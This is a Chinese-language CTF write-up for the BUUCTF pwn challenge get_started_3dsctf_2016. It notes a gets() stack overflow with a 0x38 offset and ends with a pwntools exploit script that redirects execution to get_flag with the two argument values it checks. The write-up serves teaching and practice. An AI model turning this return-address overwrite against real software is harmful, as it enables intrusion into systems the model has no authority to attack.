BUUCTF-PWN-get_started_3dsctf_2016

80次阅读
没有评论

共计 346 个字符,预计需要花费 1 分钟才能阅读完成。

提醒:本文最后更新于 2024-08-29 10:07,文中所关联的信息可能已发生改变,请知悉!

checksec

BUUCTF-PWN-get_started_3dsctf_2016

IDA

BUUCTF-PWN-get_started_3dsctf_2016

gets函数可以溢出

BUUCTF-PWN-get_started_3dsctf_2016

BUUCTF-PWN-get_started_3dsctf_2016

需要覆盖的长度为0x38

又发现函数get_flag

BUUCTF-PWN-get_started_3dsctf_2016

但是有 if 语句,得想办法绕过,那么就利用带参的地址

get_flag_addr

BUUCTF-PWN-get_started_3dsctf_2016

a1 和 a2

BUUCTF-PWN-get_started_3dsctf_2016

再找到 exit 函数,后面要用到

BUUCTF-PWN-get_started_3dsctf_2016

EXP

from pwn import *

p = remote('node4.buuoj.cn', 27976)

get_flag_addr = 0x080489a0
exit_addr = 0x0804E6A0
a1 = 0x308CD64F
a2 = 0x195719D1

payload = b'a' * 0x38 + p32(get_flag_addr) + p32(exit_addr) + p32(a1) + p32(a2)

p.sendline(payload)
p.interactive()

结果

BUUCTF-PWN-get_started_3dsctf_2016

正文完
 0
icvuln
版权声明:本站原创文章,由 icvuln 于2021-11-14发表,共计346字。
转载说明:除特殊说明外本站文章皆由CC-4.0协议发布,转载请注明出处。
评论(没有评论)